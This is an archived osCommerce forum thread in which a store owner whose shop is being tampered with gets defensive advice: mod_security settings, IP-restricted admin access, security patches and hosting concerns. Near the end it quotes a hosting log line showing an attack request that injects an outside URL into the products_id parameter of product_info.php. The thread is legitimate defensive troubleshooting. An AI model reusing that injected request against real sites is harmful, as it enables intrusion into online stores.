Latest News: (loading..)

Archived

This topic is now archived and is closed to further replies.

dfy-pro

After 3 great years, I'm being hacked!

45 posts in this topic

Hi Guys,

I have no one else to contact in that matter. I tried everything! changed passwords, usernames, even the server! (not the host yet... but that's the next step)

 

Someone is changing the payment and shipping modules and enabling/disabling products on my live site. these weird thing started happening about a week and a half ago and I simply don't know what to do.

 

I have osCommerce 2.2-MS2 installed (Admin section is protected..). it worked fine for about 3 years...

 

Anyone has any idea what to do?

Share this post


Link to post
Share on other sites

quick question, do you only access from home or do you check your site at work or elsewhere also?

Share this post


Link to post
Share on other sites

ask Your hosting company to provide you a log of admin.

 

If its done thru admin that will be known.

 

There is a monitor Your site contrib.Monitor admin.

Also chek admin log.

 

Your hosting company has to assist you if some hacking happens Youa re paying for that.

 

Satish

Share this post


Link to post
Share on other sites

also if You do have static IP then thru htaccess set it so that only pc with that IP have the right to access admin.

 

Satish

Share this post


Link to post
Share on other sites

Thanks for the replies.

 

I accessed the admin section from a couple of places including work and home. I also gave access to a programmer from India, but that was a professional company with a 100% good feedback on elance.com.

 

However, after yesterday's post, I was talking with my host over the phone and he monitored the admin's log and didn't find any suspicious act over there.

 

So he suggested I would create a new DB, import the previous one and create a new user and password. And that's what I did 12 hours ago. I made sure every detail of the admin before going to sleep. I wake up in the morning, and again, someone played with he enable/disable of all my products.

 

Here are the all details:

- I'm hosting on hostgator.com

- I have two accounts. One is used for development on a mirror site. (different DB, different user and PW, different user and PW to admin section)

- On my live site, I deleted the 'infected' DB, created a new one with new user and PW.

- Admin section is password protected, but is being accessed throughg http not https.

- No other IPs are accessing the admin section. (I monitored it through the admin's log + I placed a statcounter code on each page.)

- the behavior of the hacker is very weird. the only this he change is enable/disable of products and payment and shipping modules.

 

Any ideas?

Share this post


Link to post
Share on other sites

It depends how technical you are and how willing your host is to work with you.

 

Apache logs this stuff.

 

Depending on how technical you are, I suggest installing mod_security but make sure you understand any implications to the url and how it will effect your store's functionality.

 

As other's have mentioned, set an .htaccess file for admin access to only accept IP's that YOU set. This has nothing to do oscommerce, but is an apache-related file.

 

Have you host change the command-line(root) access password to your account.

 

Try setting up another oscommerce admin account and deleting the old one.

 

There is no such thing as an infected database. A database contains records. If those records have been changed surreptitiously, that is an access control issue, not a database issue. The database records controls who can access itself so those might b worth looking at as well.

 

Do you keep backups of your database? If not, it's a good time to start.

 

I would have given them access to a test site, have them make changes to that then YOU replicate those changes to your site.

Share this post


Link to post
Share on other sites

I have the same problem, me too after three years i got hacked. How can this happen suddenly.

 

Did you solved it already?

 

They did not change my database but the index.html keeps changing. And some other root files.

 

Also my admin directory was not passwordprotected anymore.

 

Dubwize

Share this post


Link to post
Share on other sites

Yes. I solved the problem.

 

My problem was that Mod_security was off.

Go to the .htaccess file and change:

 

<IfModule mod_security.c>  

 # Turn on mod_security filtering.  

 SecFilterEngine On  



 # The below probably isn't needed,  

 # but better safe than sorry.  

 SecFilterScanPOST On 

</IfModule>

 

---------------------------------------

Also, I found that there was actually a mysql injection bug fix on the new OSC2.2 rc2. (I was using the ms2), but since I didn't use the index file, I don't think that was my problem.

 

Good luck!

Share this post


Link to post
Share on other sites

OK, I'm very sad to say that I'm being hacked again.

Now even with Mod_security on !

 

 

My hosting provider said my software is "fundamentally flawed".

 

I did notice that there is a new version to OScommerce, the RC1. but in the update doc, they mentioned the mysql injection fix was only on the index.php file... (an I'm not even using this file...)

anybody has any idea how can this happen?

 

They are going to the product_info.php page, replacing the product name with their site, and getting into the SQL!

I seriously need to enable products every day after they have disabled them at night. this is totally crazy!

Share this post


Link to post
Share on other sites
OK, I'm very sad to say that I'm being hacked again.

Now even with Mod_security on !

My hosting provider said my software is "fundamentally flawed".

 

I did notice that there is a new version to OScommerce, the RC1. but in the update doc, they mentioned the mysql injection fix was only on the index.php file... (an I'm not even using this file...)

anybody has any idea how can this happen?

 

They are going to the product_info.php page, replacing the product name with their site, and getting into the SQL!

I seriously need to enable products every day after they have disabled them at night. this is totally crazy!

what is your url?

Share this post


Link to post
Share on other sites

hostgator is a shared hosting provider?

a lot of hacks that happen when hosts blame software is because another user got hacked from insecure scripts.

 

not saying that is definitely the case here, but as you can tell from the amount of messages and users on this boards, a lot of people use osc. if it was "fundamentally flawed" i would think all of us would have our shops continuously hacked. i've caught many attempts, but so far, none have been successful.

 

you may also want to look at your indian programmer's code. they could have unknowingly used code full of security holes. when i first started using oscommerce i paid a programmer that did code i needed it to, but none of the inputs had security filters.. data was being passed to my database without being checked!

 

and check what contributions you use. i am pretty sure old versions of supertracker have a security flaw that can be executed on the product page if it's unpatched.

Share this post


Link to post
Share on other sites
hostgator is a shared hosting provider?

a lot of hacks that happen when hosts blame software is because another user got hacked from insecure scripts.

 

not saying that is definitely the case here, but as you can tell from the amount of messages and users on this boards, a lot of people use osc. if it was "fundamentally flawed" i would think all of us would have our shops continuously hacked. i've caught many attempts, but so far, none have been successful.

 

you may also want to look at your indian programmer's code. they could have unknowingly used code full of security holes. when i first started using oscommerce i paid a programmer that did code i needed it to, but none of the inputs had security filters.. data was being passed to my database without being checked!

 

and check what contributions you use. i am pretty sure old versions of supertracker have a security flaw that can be executed on the product page if it's unpatched.

 

Thank you eww! This is very helpful.

 

As far as the indian programmers, I think they didn't touch the product_info.php page, but I installed the product option type contribution about two years ago...

 

I think I'm going to try putting the latest version of the contribution on a fresh OSC version. and if that's not going to work, I'll switch hosting.

 

I will update you soon. Thanks again.

Share this post


Link to post
Share on other sites

if you read that topic about the new osc version, if you have a modified store, you may break it by upgrading.

 

i have dozens of contributions and custom code i did myself on my shop.. i did not upgrade, but i applied the security patches (i believe there is only 2... one for currency and and another sorting injection fix)

 

before you apply the fixes, test the currency exploit and see if it's possible they gained entry through that exploit.

 

 

i don't know much about hacking, but they may not have needed access to the product page to impact the product table. there's a lot of calls on osc that pull product info.

definitely check any custom code you're using and don't forget to post back when you know what happened, so the rest of us can secure our scripts if we're using the same code as you :)

Share this post


Link to post
Share on other sites
if you read that topic about the new osc version, if you have a modified store, you may break it by upgrading.

 

i have dozens of contributions and custom code i did myself on my shop.. i did not upgrade, but i applied the security patches (i believe there is only 2... one for currency and and another sorting injection fix)

 

before you apply the fixes, test the currency exploit and see if it's possible they gained entry through that exploit.

i don't know much about hacking, but they may not have needed access to the product page to impact the product table. there's a lot of calls on osc that pull product info.

definitely check any custom code you're using and don't forget to post back when you know what happened, so the rest of us can secure our scripts if we're using the same code as you :)

If you download and unzip RC1, you will see upgrade.html which contains all of the bug fixes and improvents (definitely more than 2). They will not break your store.

Share this post


Link to post
Share on other sites

posted by a team member: http://forums.oscommerce.com/index.php?sho...8335&st=220 (top post should be from Jan Zonjee):

There was at least one for an sql injection on the sort functions on index.php. There is a bugfix for currencies though in rc1:

 

 

and posted by vger (whom i consider to be very knowledgeable and helpful on the osc boards):

I'm sorry if this sounds harsh - but for website owners to upgrade to RC1 when they have live shops already modified with contributions is just asking for trouble.

 

If your shop is modified - DON'T DO IT! Wait until updates are posted for the contribs you've installed which makes them compatible with RC1.

 

If you must do it - then do it on a test version first, either offline or installed in a folder on your hosting.

 

Vger

Share this post


Link to post
Share on other sites
posted by a team member: http://forums.oscommerce.com/index.php?sho...8335&st=220 (top post should be from Jan Zonjee):

and posted by vger (whom i consider to be very knowledgeable and helpful on the osc boards):

Yes Jan and Vger are very knowledgeable, but I have already done it without problems. As I said, it is not now an RC1 store, it is patched to RC1. Also, I did not do the state names improvement because I use country and state selector.

Share this post


Link to post
Share on other sites

ok, maybe you don't use the same contributions that the other people use that have had problems installing rc1 :)

i for one, never upgrade software unless absolutely necessary (such as, security fixes).. why fix something that isn't broken

Share this post


Link to post
Share on other sites
ok, maybe you don't use the same contributions that the other people use that have had problems installing rc1 :)

i for one, never upgrade software unless absolutely necessary (such as, security fixes).. why fix something that isn't broken

Maybe the over 100 addons I have aren't common, but I do agree with why fix something that isn't broken. That is why I do update my addons for no reason.

 

Anyway, this is all off topic and not helping with the original post.

Share this post


Link to post
Share on other sites

sure it's ontopic, it can help others to decide whether they need the full package to rc1 or not. the overall topic for in the news forum was mostly offtopic, but was of a great deal of help to me.. helped me decide against the full install.

 

if one is not familiar with php and has a contribution that is using part of the code that the install instructions say to modify, they are going to encounter problems.

Share this post


Link to post
Share on other sites
sure it's ontopic, it can help others to decide whether they need the full package to rc1 or not. the overall topic for in the news forum was mostly offtopic, but was of a great deal of help to me.. helped me decide against the full install.

 

if one is not familiar with php and has a contribution that is using part of the code that the install instructions say to modify, they are going to encounter problems.

Yes, I did not do the full install either, just did the patches.

 

They will have problems when one contribution uses part of the code from another and they have to merge the addons. I had no problems with the updates clashing with addons.

 

OK, still waiting for the url so I can see what the hacker did.

Share this post


Link to post
Share on other sites

Hi

 

It is fine changng files etc, but one thing has never been asked in this topic.

 

 

Does anyone else in your home have access to your computer, as this could be a simple reason someone at home could be access your files when you are not around and changing these.

Share this post


Link to post
Share on other sites

1. If on a shared server do not set "Use Cache" to true. What you may be seeing as a hack could simply be the details of another website appearing on your site by virtue of using a server-wide cache folder aliased to the cache folder on every site on the server. Meaning - your cache folder is actually linked to the server-wide cache folder, allowing other sites Categories/Products to appear on your website.

 

2. If using MS2 then it should be enough that you update your website with all of the latest security pacthes and bug fixes contained in MS2 (060817). Though not available for download from here it is still available on Source Forge[dot]Net and other places for download.

 

3. If you have been running your osCommerce website for years without applying bug fixes and security patches then you have only yourself to blame if you got hacked. No software is future-proof and does have to be kept up to date.

 

4. If your server uses cPanel as its control system then you should be aware that cPanel has no jailed root, so if one site is hacked on the server then the hacker may be able to access other sites (perhaps all of them). Additionally cPanel itself is hacked on a fairly regular basis (3-4 times per year) and when that happens the hackers can get to everything.

 

Does anyone else in your home have access to your computer

 

(5). That's not necessary if your PC has been hacked by an outside source and is under their control.

 

Vger

Share this post


Link to post
Share on other sites
4. If your server uses cPanel as its control system then you should be aware that cPanel has no jailed root, so if one site is hacked on the server then the hacker may be able to access other sites (perhaps all of them). Additionally cPanel itself is hacked on a fairly regular basis (3-4 times per year) and when that happens the hackers can get to everything.

(5). That's not necessary if your PC has been hacked by an outside source and is under their control.

vger

what are the vulnerabilities in getting hacked (because of cpanel) on a vps, if the cpanel update is on cron?

Share this post


Link to post
Share on other sites

Thank you Vger!

 

I'm following your instructions one by one:

 

1. in the admin section, cache is set to false.

 

2. I havn't applied the update yet on my ms2. I didn't do it since I saw that the mysql injection fix was only to the index.php file, and I'm not using this file in my system. (my site starts with a simple html home page)

- However, I asked my programmer to update the code for me tonight. (I can't do it myself, since my system is heavily modified)

 

4. I just bought a new hosting package on a shared server from a different hosting provider that doesn't use cpanel. for some reason, I think that's related some how. I'm not sure.

 

Hostgator provided me with the following information regarding the mysql injection on my site:

 

'ip.--.--.ip' /product_info.php?products_id=http://mifumisokuimsedfsisumsdoklop.mail15.su/image? 200

 

I deleted product_info.php from my test site, changed the cpanel, admin and DB user passwords, but it's still going on over there.

Share this post


Link to post
Share on other sites

do you use on the fly thumbnailer? there was a vulnerability in it a few releases back

Share this post


Link to post
Share on other sites